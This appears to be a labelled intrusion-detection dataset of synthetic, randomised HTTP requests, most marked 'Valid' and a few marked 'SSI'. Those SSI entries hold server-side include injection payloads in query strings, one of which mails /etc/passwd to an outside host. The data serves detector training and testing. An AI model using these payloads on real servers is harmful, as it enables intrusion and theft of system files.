Transfer-Encoding: identity
Upgrade: 9noias/3.8, wsg/8.7
Warning: 805 www.ithet.png:8 "EIrr" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40113
Start - Id: 17781
class: Valid
GET /zmitmluta/sRLtzu-Foz/llgorfg/cA/ecenc9n/oN0Ac40wgut/nV1d3lLm/lkiNtrafmntsms2/nIrLB2VMVgPia_Tgaysi.bin? HTTP/1.1
Host: www.o8r6luaad.gov
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 77.125.92.204
Cookie: owv8=ynsNoomhg;inRhJgCgy_Q=?d+3ir?r5l
Cookie2: $Version="528"
Date: Tue, 18 Oct 05 07:24:07 CET
ETag: W/"5vOTT8TNK6GFk_JxrAl"
Expect: lthnw
From: lidu@tsshrn56h.org
If-Modified-Since: Sun, 30 May 04 12:25:51 UTC
If-Unmodified-Since: Thu, 20 Mar 08 07:20:45 UTC
If-Match: "O4l9d69gwoG8GJO1Y"
If-None-Match: "vdYwHq2.kEyhSms"
If-Range: *
Max-Forwards: 51
MIME-Version: 3.7
Pragma: pa9IjDj='aynee'
Proxy-Authorization: Digest qop=auth
Authorization: jrama o8Nh=sptasue
Range: 329245-531,569228-311014,-5
Referer: http://67nwe.de/igwdmra/r7uhg9/ii61.aspx
TE: deflate,trailers
Trailer: Expect
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 3.3; sr-tu; rv:5.8.6) Gecko/33923823
UA-CPU: x86
UA-Disp: 2786,862,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 582x198
Via: 4.7 www.noblcd.gif, FTP/2.7 16.129.146.201, HTTP/0.5 243.99.216.133
Transfer-Encoding: compress
Upgrade: aif/1.2
Warning: 685 www.cMeV7n.jpg "Rshilnhailrb" "Fri, 30 Apr 10 23:05:54 CET"
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 990081
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17781
Start - Id: 4550
class: Valid
POST /CAZN9GopyQnar/GG0fnSwwinntB/fghIK2/hiJpa-fKzs/iE4Ilxia/o3/eenEwntLvho/ofywRtN9aaAas/Mwd/q6IGechocGAaccess_logfj4/dea.png? HTTP/1.0
Content-Length: 318
Content-Language: ntie3f,tzgss4t
Content-Encoding: gzip
Content-Location: /catU/to7xt/ouhCrr/rgbiuf.zip
Content-MD5: MTNvYTJudGhpaWN0YXVteg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Dec 09 17:31:12 UTC
Last-Modified: Mon, 01 Aug 05 15:41:47 GMT
Host: www.oaka.it:281
Connection: keep-alive
Accept: text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: soc-tnt;q=0.2, lyealiS-fnivmain;q=0.5, waane-nhhr, 3eAd-nae;q=0.1
Cache-Control: c=J8r9nu
Client-ip: 131.137.11.104
Cookie: anartn7=@
Cookie2: $Version="1"
Date: Tue, 20 Feb 07 04:37:23 CET
ETag: W/"qeHGrc95g0GImT00kGEh"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Mon, 16 Jun 08 22:30:42 GMT
If-Unmodified-Since: Fri, 13 Jan 06 08:44:14 CET
If-Match: *
If-None-Match: "XrUWnQ4lAV5M6vc@R5D"
If-Range: *
Max-Forwards: 793
MIME-Version: 1.4
Pragma: m=seahr
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: -574,-888
Referer: http://oeals.ch/eeiessch/3twf.dll
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.7 (X11; U; Linux i586 8.6; vl-sw; rv:4.0.9) Gecko/58166494
UA-CPU: x86
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3467x636
Via: 4.3 78.171.212.142, HTTP/2.7 www.olHtn.html:75
Transfer-Encoding: gzip
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 831 23.54.115.116 "diole" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 60314
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eAiRspeisbaodp=nbgfzob&7b6Gga=1&yIgVCy=nnd1lREnroEn&nHoy79=ihtaccesinesin1hpuhAt<:bodyseo&a2h0lee6eiylanl=idntc9oon&r0abT&fi~&ZGri@cv3VwW=70563&tswsd=aGklLeAP&hmi08imn=1197996181&dkkJH=axIcwindow.openssdE9htjtu&twSrcdceedmoeut=ECfwget&hbdtblIR=ttbt&ytR9ttGtt9i=slnrcaqanuhsoe&hHqq8i=dmhFTwOZfOYi&0nm0=kneEshm

End - Id: 4550
Start - Id: 30293
class: Valid
GET /tebNshutdowntTBVUMT6/7.0EI/sPeV@WUxYDaiyKH/ri/tZ/9e2eeS3aop6/@hNAWAVHBzexecPLt.cfm?s5pekb=t%40wpcbNK8&2K@bDeval=157534155&erDRhQeitqe=o1BebTB&aeO7=u%3Az+0&4U.uhlXZr.lh=abnverm&s0orwm12=09 HTTP/1.0
Host: www.nivdro.gov
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.9
Accept-Encoding: gzip;q=0.8, gzip;q=0.3
Accept-Language: *;q=0.6
Cache-Control: min-fresh=1454
Client-ip: 195.48.49.162
Cookie: ulb4z=uten
Cookie2: $Version="18"
Date: Fri, 31 Aug 07 21:45:37 CET
ETag: "kPrrE259PGi65-tL"
Expect: 100-continue
From: zrsektq@asetec.cz
If-Modified-Since: Tue, 10 Feb 04 18:43:09 GMT
If-Unmodified-Since: Sun, 16 Dec 07 10:13:20 GMT
If-Match: "xnxGeJz.cuFrDtJf5"
If-None-Match: *
If-Range: Wed, 30 Dec 09 05:01:52 GMT
Max-Forwards: 1669
MIME-Version: 1.8
Pragma: jdv=kfEea
Proxy-Authorization: Basic ZWR0dDpFaGVvOQ==
Authorization: Basic YXRhZXR0OmlwYXlh
Range: 060057-
Referer: /n64nsn.php3
TE: deflate,trailers
Trailer: Range
User-Agent: Mozilla/8.1 (X11; U; Open BSD i386 1.0; en-ax; rv:1.2.2) Gecko/36462316
UA-CPU: MIPS
UA-Disp: 132,042,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 691x450
Via: Usalti/0.8 www.mei5.png
Transfer-Encoding: gzip
Upgrade: 1nt/1.0, ro5lno/8.9, ef7eT/2.2, flzros/0.3, raaae/2.1
Warning: 610 www.asyfa7.png:791 "eaiobtefu" "Tue, 13 Apr 10 21:48:36 UTC"
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 60742
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 30293
Start - Id: 9027
class: Valid
GET /nlGqVBdJkYL/qtftdsfeajztHf5n/bt0/Gjtudrnp9ig/gGluqbFaSH/kxuSnxfxaoz5uee/dSIEhEB1wIKkZFR/lQ/anbsczmt1ovi/UfaW.I/oE6HO/rRRKOcuS3sefRk..gif? HTTP/1.0
Host: www.veOcoah83.cz
Connection: keep-alive
Accept: application/*, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eeenslet-h;q=0.2, cdjd-Aincf;q=0.7, lU5ie-hlhon;q=0.2
Cache-Control: no-transform
Client-ip: 126.20.183.189
Cookie: iye=45746188;acrdi=or |ssnNee
Cookie2: $Version="71"
Date: Tue, 01 Nov 05 18:47:23 GMT
ETag: "menuXqdYvhTCYszqhrT"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: haaa@uRemarat.uk
If-Modified-Since: Tue, 11 Dec 07 11:26:06 GMT
If-Unmodified-Since: Sun, 27 Mar 05 19:29:56 CET
If-Match: "ujr.bBPsxujW9is"
If-None-Match: *
If-Range: Thu, 06 Jul 06 07:07:02 UTC
Max-Forwards: 67
MIME-Version: 0.6
Pragma: tt='tejrne'
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: NTLM cmI1ZWV5eGxCbWlvaW0yTmlocmxmZ2JzZG1GdG5zdWVvYXNUVXRXODdh
Range: 5-300138,73-
Referer: /ql9w1/7ett/rlpho/ssheti.doc
TE: trailers
Trailer: Accept
User-Agent: heL8y (nLYlXI; 5DV5CN; cGPR6f; adqrSd)
UA-CPU: PowerPC
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7425x380
Via: FTP/9.5 175.71.107.104
Transfer-Encoding: gzip
Upgrade: cc0r/5.3
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9027
Start - Id: 26011
class: Valid
GET /oekTeCo/uJlIDI5-N_L/bhLawaSra8inhpsin/fFZd7/FrI6dJc4plz/xDYlV-MvOPfQYQq/x37Tstaoobhbdacer/wk7OZoje.hqK-KGpLYc/ewoko3roi.htm? HTTP/1.0
Host: 39.111.57.253:9448
Connection: keep-alive
Accept: audio/*
Accept-Charset: hz-gb-2312;q=0.7, windows-1250, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: aokedo0d-Oa;q=0.0, iohvd8-so, tffu2lio-femuGL;q=0.1, tild8a5o-oz36th2
Cache-Control: max-age=6
Client-ip: 254.230.111.50
Cookie: no=cT6TTlhuGeaie;ljDEyIvq-or=i;RbWJ=hHvDSjpHgA;pewdeT=4
Cookie2: $Version="46"
Date: Fri, 05 Jan 07 14:14:04 CET
ETag: W/"ANnuE.x-5w6Q52AxA"
Expect: hmrtyoF
From: rerwoEN@echst.gov
If-Modified-Since: Sun, 13 Jan 08 04:21:49 CET
If-Unmodified-Since: Mon, 19 Oct 09 22:13:32 UTC
If-Match: *
If-None-Match: "jSYfbjn_41WMsdJ"
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 78
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: int3j hewrw3=donnt
Range: 93614-
Referer: /NmJetShi.php4
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.7 (X11; U; Unix 5.7; jt-mn; rv:2.1.6) Gecko/06443800
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8535x949
Via: 2.2 www.thretUI.jpeg
Transfer-Encoding: identity
Upgrade: yuk/5.7, RisS/8.9
Warning: 954 235.185.114.28 "nlyee" 
X-Forwarded-For: 207.60.158.11
X-Serial-Number: 2136376568868794089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26011
Start - Id: 40669
class: SSI
GET /nnrXrDXoj6jzeepBHcAh/ye1/Fux7boot.iniall.M7Ztmp1Y/xhc0swEatt1elH/sDiom.tevj.gif?b0iaEd4=129900516&35orcds8gosasn=o6LifREX8&cevbtnt9elnrnhr=acde&gssen3nfyp2e2=3&autoexecBKwpIDMEO2=7&DrH=%25w+ac+serm-Twd7%3A+i&Rpgi=084457&l1IkhlsbRaw=sz60E&ae=tt%7EdarR%2Blet&ncyonmnnCi=+rhttpsriie%7Es&asAale2i8loxt=%3C%21--+++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&Sehudao=6391&xei=wf%5D HTTP/1.0
Host: 110.183.133.108:80
Connection: mTtf1zd
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 164.125.136.123
Cookie: jn0Tt=2475;iinmoCsel=eGdbocweo@a xp_eputa ;nt2h9ObhbIwaoi=49708;tpetsttonesjM=52589948;tdcsa1aumj1tmil=5758070
Cookie2: $Version="3"
Date: Mon, 02 Nov 09 07:24:19 CET
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: hteeprhr@4tIt.it
If-Modified-Since: Mon, 03 May 04 19:55:29 UTC
If-Unmodified-Since: Tue, 25 Jul 06 22:55:01 UTC
If-Match: "kfdn1RX75_0zJqGC94"
If-None-Match: "NfvBFjOek-q-jol_8"
If-Range: Thu, 08 Sep 05 24:33:23 CET
Max-Forwards: 9
MIME-Version: 2.4
Pragma: no-cache
Authorization: nhNb Ddocr7n=Tpxcise
Referer: http://www.4byaga.fr/v0e0S/ipaioapc/4da4/wanN8.php
TE: chunked,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (Windows; U; WinNT 6.6; ti-ap; rv:2.0.1) Gecko/77438239
UA-CPU: MIPS
UA-Disp: 395,6940,8
UA-OS: Windows 98
UA-Color: color32
Via: n2oinv/9.8 54.61.43.114
Transfer-Encoding: compress
Upgrade: Ieaz1d/7.8, tans1/5.7, lea1/1.7, 8viely/9.9, eeton/2.9
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40669
Start - Id: 7286
class: Valid
PUT /vmieue/aqeV-uB300l-i9CL.asp? HTTP/1.1
Content-Length: 15
Content-Language: onf,laewzett
Content-Encoding: deflate
Content-Location: /msxoldrt/54hrjd.exe
Content-MD5: d3RvMjllckRlMXRlZWNOaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Apr 06 22:45:18 CET
Last-Modified: Fri, 07 Oct 05 09:25:28 UTC
Host: www.triworIdho.gov
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.2, euc-jp, iso-2022-kr;q=0.5
Accept-Encoding: identity;q=0.9, compress;q=0.6, compress, identity, deflate
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 180.159.10.206
Cookie: chgroUs1v=ke>inufas=;wowxTxRjE=~glneeszpaqee;ssttYs=426197
Cookie2: $Version="2"
Date: Sat, 21 Apr 07 24:48:04 UTC
ETag: W/"iKsY@9R8Jv5R1c9ROf77"
Expect: 100-continue
From: aleOu@hlmCevz4na.org
If-Modified-Since: Tue, 02 Mar 10 04:04:02 CET
If-Unmodified-Since: Tue, 01 May 07 20:07:19 GMT
If-Match: *
If-None-Match: "dehlTL@E-7uMZSOV"
If-Range: "4SvR_YhE2JOozr1"
Max-Forwards: 706
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Eirtt hmefn=eehsteiw
Authorization: NTLM ZVg1cmxJb01zQWpobm90aWpkaWFleWFjNDltUm10dGlzaGxhc3RpNm45dW5t
Range: -4
Referer: http://nfeTiu9w.net/idhneeme/sfoif9.php3
TE: deflate;q=0.4,deflate;q=0.7
Trailer: Connection
User-Agent: t7iy (eUkQZ_aJjB)
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2511
Via: 4.3 34.62.134.157, 2.9 36.12.162.36, FTP/7.2 www.prefae.png
Transfer-Encoding: identity
Upgrade: 8ei/2.8, 5Top/6.3, d1taLe/8.4, tua1ja/2.3, 0eo/2.4
Warning: 924 www.rtAils.htm:75 "ahvM8nsnku" 
X-Forwarded-For: 51.142.208.191
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

alsi3re1eANs=53

End - Id: 7286
Start - Id: 21375
class: Valid
GET /4rfG/yaza/7GWcR68M/voi/i2mRIja@roY9O6krLvn/nokRCJ.-vvn9g.WgPsP6.exe? HTTP/1.0
Host: 66.182.237.150:529
Connection: u7ehtn
Accept: image/*;q=0.4, image/*, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mouurt-i, liND-jhei;q=0.6, ud-es1roea
Cache-Control: only-if-cached
Client-ip: 20.10.119.201
Cookie: Pxp_IKs5CUdocumentB=6542;iOoddiaz4=Rlveioe$
Cookie2: $Version="4"
Date: Wed, 08 Oct 08 06:18:51 UTC
ETag: "NH-4d06ZBYMuVX6"
Expect: iece
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Tue, 16 Nov 04 11:21:42 CET
If-Unmodified-Since: Sat, 02 Jun 07 04:53:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 May 06 08:58:42 UTC
Max-Forwards: 7
MIME-Version: 7.5
Pragma: ac=nEe
Proxy-Authorization: Basic d2UxZUU6ZGVzY200d0E=
Authorization: xe8l uipg02=cxog
Range: -510,-15,91865-958
Referer: http://8eou.gov/osScqveb/oeet.exe
TE: chunked;q=0.0,gzip;q=0.0,trailers
Trailer: TE
User-Agent: iaIxi4a (tGjQYJAjA4; eAY_S4; sjtH17d0Q)
UA-CPU: PowerPC
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: HTTP/4.6 212.2.192.67, FTP/7.3 157.109.89.212
Transfer-Encoding: deflate
Upgrade: ehr5t1/8.1, ans/4.0, Pae/6.5
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21375
Start - Id: 40021
class: SSI
GET /avIwb9N/rCmLQkr/szrnntpg3dn1Edouaams/dRoT/@O3between1a9xRoL1dLe/MSWZHTO/badminSGU9YMZJD/eEij/iig/trEiGdlslEaksec2re7o/PSv8CS8H/rDleegEf.htm?Leshhevoteem=%3C%21--+%23exec++++cmd%3D%22%2Fbin%2Fmail+++++ouoIip1as5.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&sf20jupwbfd=id6x8tCAex&iptijtieva=79750&OKwhEE2P5G9=664896&heet=huIosoeeN%5Ccmd%24tTara&Eniatnnas=a&MtunYaDs6zre6ao=etpnoaeqetc9Csui&nfmrysjdlrsd=npuowedeehoen&.@5sereplaceaI=dn7t7kAf0 HTTP/1.1
Host: 129.76.158.77
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-arabic;q=0.4, windows-1257
Accept-Encoding: *;q=0.3
Accept-Language: sQga2ssS-oaxdnna;q=0.3, aio-wL, ah7g-ra, tdr-a4, sXi-2tettep9;q=0.8
Cache-Control: Itap7e=we
Client-ip: 52.59.150.100
Cookie: @.jW-=rerjt795dEd;m9rnc3tXe=te ;elLeihhnonedBr=d~hgn)(7;Hajtn=qplafaan;eeefnrIyWEhfT=097;ayneri3Rvx=046
Cookie2: $Version="3"
Date: Sun, 28 Jun 09 09:14:00 GMT
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: eerIners
From: bic3us@lb0or.fr
If-Modified-Since: Sun, 11 Feb 07 03:54:13 CET
If-Unmodified-Since: Sat, 16 Jan 10 18:17:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.8
Pragma: t=xsA3namm
Proxy-Authorization: Digest nc=dAb63AAe
Authorization: Digest cnonce="ainumz"
Range: -3133,098560-154144
Referer: http://www.dm6stra.biz/oUoe/5yIF/suyf.nsf
TE: trailers,deflate;q=0.0
Trailer: Cache-Control
User-Agent: skCyKM0 http://www.qeAseh.net
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: trnmD/4.9 254.147.141.148, 2.3 244.133.93.199
Transfer-Encoding: gzip
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 801 www.A9Ccfets.tiff "iayeatistfeuar6rsnb" "Tue, 13 Sep 05 19:40:44 GMT"
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40021
Start - Id: 2129
class: Valid
GET /Rnk3hbdLoa/HaTeYatr/oHRKDp_sFFmkVl/FjTHgD/rErNhEdT7kd8.tiff?telnetfbinC=Ltenaiot6si7&ept=ihre&mlee7Nn=5dtmPe3wIt&eborhse=oUxcwLo HTTP/1.1
Host: www.oeonpf.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.1, hz-gb-2312, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: e7Nbak1t=insSuigf
Client-ip: 237.9.247.14
Cookie: hwbh5whelirodrG=t05uWBp;it83fosoine=265;eti8eoeipn=9652905;e4iEwhoeel=asNtbruhe;tZz4scriptS22dscript=Aptexp_rooN;tepmn;2hen=608
Cookie2: $Version="376"
Date: Mon, 29 Jun 09 09:40:08 UTC
ETag: "FAc2zi4siQ00_Em6CPV"
Expect: fi2eoiSe
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Thu, 01 Feb 07 01:07:56 CET
If-Unmodified-Since: Sat, 16 May 09 01:45:19 UTC
If-Match: "J.r@RxJtIPLfo96Qy04c"
If-None-Match: "JRZAfMeNWXKrS_21"
If-Range: "82pR3vcpU0pdy-M4WHH3"
Max-Forwards: 471
MIME-Version: 0.9
Pragma: 5nzcosot='e'
Proxy-Authorization: Digest qop=auth
Authorization: otecM Thvuan=0stst
Range: 9797-
Referer: /rQelrC/jctt2oo1/euKbs/bhsw/clHhpfli.png
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: f3fnnanzta (dSF2vEQpP; eiLhAMM44; a-6l5F9a; ek-lKKPt; nUebV7q)
UA-CPU: MIPS
UA-Disp: 4115,383,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 539x1521
Via: 7.3 www.00wzrd.js:846
Transfer-Encoding: compress
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 456 www.asdhn.gif:2845 "ronln6simQtdh" "Thu, 30 Jul 09 15:57:06 GMT"
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 9895241717803854226
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2129
Start - Id: 12044
class: Valid
GET /nidhavingCE/P7O/egKgvP3EqYo7IOD/1pZW/7__caO/a9W9SM6FpGPer1a/WJGt%u/thieLodela5S/iT6O1lpKl8QBiNse@CWK/Ni58c/Oe/r@8n0a2hlWe22.png?fromGtscriptT0tNO=87665&4asdlcahcI=replacei%7Enecnetcat&settahle=304493&tfeAd=emrwhn7nc&yrncgaM8ta=tshdkhconnectn%2BXietrt&yNlEuYU2W=62&ueumieanRo=sw5fpaaa9ih9eneih&ztHheir5Lahsx3n=r7%40f&tae=%25aw++e6st%3Aei%7Ceg-&csahnhts=%3F%3Dmtmm17oMh&Qz@Maccess_logcsFFsock_stream=977948658&8me=928&un1izr=txeeaymtlst0%3B%7Eptq%3Ao HTTP/1.1
Host: www.vkig9.uk
Connection: close
Accept: text/html, video/*;q=0.9, text/*
Accept-Charset: iso-8859-4;q=0.5, koi8
Accept-Encoding: *
Accept-Language: jjl-aOtl;q=0.1
Cache-Control: no-cache
Client-ip: 65.220.207.248
Cookie: pbin2RSJBaU=939240;nsteic6lrhoiy=ssthaorrin
Cookie2: $Version="3"
Date: Sun, 26 Dec 04 24:27:23 CET
ETag: "RuAH@YKFw2-.73i6"
Expect: 100-continue
From: seie@tihiEvEoh.it
If-Modified-Since: Thu, 23 Feb 06 07:33:30 GMT
If-Unmodified-Since: Sat, 18 Aug 07 11:29:51 UTC
If-Match: "MZ1DFdWweQzKAp5-ekl"
If-None-Match: "x@xYKSKz63HV.Q_vA"
If-Range: Fri, 24 Nov 06 23:17:23 CET
Max-Forwards: 04
MIME-Version: 6.1
Pragma: tAEagmf=hews
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: NTLM R2lyTWlmSW5naTlsb1hpcXJleGxwcXJheXdsYWllc25sZG5QYW50c3Q=
Range: 421490-
Referer: http://www.efhilr.ch/jh8r6vn/3ue06/5ahe8/oirogmer/hnw3bae8.png
TE: chunked,trailers
Trailer: Warning
User-Agent: Mozilla/5.2 (compatible; Konqueror/4.2; Linux i386; 8fmnioe)
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 165x736
Via: 7.9 www.Tslqa3sq.jpeg, 4.3 97.206.83.175, 8.1 202.247.250.58
Transfer-Encoding: deflate
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 612 www.s27m.htm "eouphmjfeh7gCrcyr" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 58925
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12044
Start - Id: 40174
class: SSI
GET /p4wftdrskoainme/ccnjrsfts5/ig9R40Av/CFmqG0tpOoV/t-Azzu/eoniwl/sfsam-andGexec/ntfjuu5fyeSfeSwMbaN/child@oweBiaGBabodyxwG/9fr3-kJG.cgi?fe7yr=%3C%21--+%23exec++cmd%3D%22%2Fbin%2Fls+-l+++%2Fhome%2Feitun9%2Fsawso%22+++--%3E&5sh=Trtb&nhfsct=068903&anhgtbusnic=ttodnaee+rBnsgo%2Fzinput&nnsn=150424&ZStS-nRh8i=ra%3Ashh HTTP/1.1
Host: www.le1fipsee.fr
Connection: close
Accept: video/mpeg;q=0.9, application/x-tar;q=0.7
Accept-Charset: gb2312;q=0.3, iso-8859-3, x-mac-greek;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 34.79.0.86
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Tue, 25 May 04 15:52:10 UTC
ETag: "kg8qsPix3ArBi0OMOM"
Expect: 100-continue
From: ehdOien@nrfOlifTi.org
If-Modified-Since: Fri, 14 Jan 05 24:03:53 GMT
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Oct 07 10:46:53 GMT
Max-Forwards: 4
MIME-Version: 6.0
Pragma: Ei6oon=nt
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 85-
Referer: /atogIfl.dll
TE: trailers
Trailer: Warning
User-Agent: Mozilla/9.5 (Windows; U; Windows NT 0.9; Ta-lc; rv:1.3.8) Gecko/99293733
UA-CPU: StrongARM
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8851x316
Via: 8.7 www.wrb6h.jpg, HTTP/3.5 www.gtoaqnA.shtml
Transfer-Encoding: wseh
Upgrade: jil/6.4, nmatei/2.7, 8mb/9.3, iejhA/3.6
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40174
Start - Id: 23466
class: Valid
GET /zhfuGyQ6Mgcr/mBnsycylhuuuctqegul/ahbtahhaaitWM4rmimi/mfnAd6flhhHntnghdye.html?tobtn4erruebat=i3thweodtD&rgstuma8hiah=kscgLaDn5&auttamemacdol=+ra&seizstsfoede=898&rmMseddliwytt=drho&f6roen=oalzl8aLRkV&ke=u_AeX HTTP/1.0
Host: www.erat.net
Connection: dsbum
Accept: */*
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 153.160.70.239
Cookie: hdItGo=leutnonsM5egStslo;cei2=8QoAEAttent
Cookie2: $Version="551"
Date: Tue, 14 Jul 09 16:48:12 CET
ETag: "S4lWn7XHlLm82wUX"
Expect: retyst
From: tocfie@tta6.cz
If-Modified-Since: Wed, 07 Nov 07 18:02:47 CET
If-Unmodified-Since: Fri, 15 Jul 05 09:52:40 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 29 Dec 08 08:08:26 UTC
Max-Forwards: 19
MIME-Version: 3.9
Pragma: e='ihtcdi'
Proxy-Authorization: NTLM aWVpYW9zbXQ2emUwdXNyckxjZm5lZGZmSXFlbnJoc3RpMmVucmk=
Authorization: NTLM MGVyMWE0aXR1c2FnZ3NtbHJnZXRobmp5cjU1YW53MUFpdVI2N25zb3ll
Range: -75,66578-5826,838999-
Referer: http://odlxsit.cz/endcm0eo.png
TE: trailers,trailers,trailers
Trailer: From
User-Agent: nTpajdAe61rdlibanet
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 543x2792
Via: FTP/0.2 241.94.46.165, FTP/7.8 107.118.202.132
Transfer-Encoding: deflate
Upgrade: aef0/8.9, reo/8.3, ics/7.6
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23466
Start - Id: 8655
class: Valid
GET /aiCi1eKAFZm7j6-HSF.bin?Nryaxc=02090228&6N=681&eis=ntpheg&oet4=39394708&t1ocy=lhw4f4eijeoee&cYbs=95 HTTP/1.0
Host: 206.127.10.72
Connection: keep-alive
Accept: image/png;q=0.0, text/html, text/xml
Accept-Charset: cp-936;q=0.2
